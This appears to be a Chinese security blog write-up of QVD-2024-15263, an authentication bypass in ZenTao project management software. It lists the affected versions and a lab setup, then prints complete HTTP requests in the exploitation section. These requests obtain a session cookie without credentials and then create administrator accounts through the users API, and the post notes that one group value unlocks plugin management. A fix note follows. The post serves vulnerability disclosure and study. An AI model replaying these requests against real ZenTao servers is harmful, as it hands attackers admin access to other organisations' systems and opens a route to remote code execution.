QVD-2024-15263：禅道身份认证绕过漏洞

关注我们❤️，添加星标🌟，一起学安全！
作者：XbnWa@Timeline Sec
本文字数：980
阅读时长：1～3min
声明：仅供学习参考使用，请勿用作违法用途，否则后果自负

0x01 简介

禅道由禅道软件（青岛）有限公司开发，国产开源项目管理软件。它集项目集管理、产品管理、项目管理、质量管理、DevOps、知识库、BI效能、工作流、学堂、反馈管理、组织管理和事务管理于一体，是一款专业的研发项目管理软件，完整覆盖了研发项目管理的核心流程。

0x02 漏洞概述

禅道项目管理系统在开源版、企业版、旗舰版的部分版本中都存在此安全漏洞。攻击者可利用该漏洞创建管理员用户，获得后台管理员权限。在进入后台后，也可以结合其他漏洞实现远程代码执行。

0x03 影响版本

v16.x <= 禅道 < v18.12 （开源版）
v6.x <= 禅道 < v8.12 （企业版）
v3.x <= 禅道 < v4.12 （旗舰版）

0x04 环境搭建

windows安装包地址如下:

https://www.zentao.net/dl/zentao/18.10/ZenTaoPMS-18.10-zbox.win64.exe

成功搭建

0x05 漏洞利用

未授权获取有效cookie

GET /zentao/api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=dddidkyodsnfamzvjidb&branch=klmnehgxnsmeuhshbooy HTTP/1.1
Host: 127.0.0.1:81
Content-Length: 2

创建管理员用户

POST /zentao/api.php/v1/users HTTP/1.1
Host: 127.0.0.1:81
Cookie: zentaosid=xxxxx;
Content-Length: 90

{"account":"rootroot","password":"Qwe123","realname":"rootroot","role":"","group":"2"}

登录成功

将group改为1会多一个插件管理

POST /zentao/api.php/v1/users HTTP/1.1
Host: 127.0.0.1:81
Cookie: zentaosid=xxxxx;
Content-Length: 86

{"account":"tttttt","password":"Qwe123","realname":"tttttt","role":"","group":"1"}

0x06 修复方式

升级至安全版本
https://www.zentao.net/index.html

参考链接

https://www.zentao.net/book/zentaopmshelp/76.html
https://x.threatbook.com/v5/article?threatInfoID=107860
https://mp.weixin.qq.com/s/FwKHmDxD7eyfiuZPNoGM6A

历史漏洞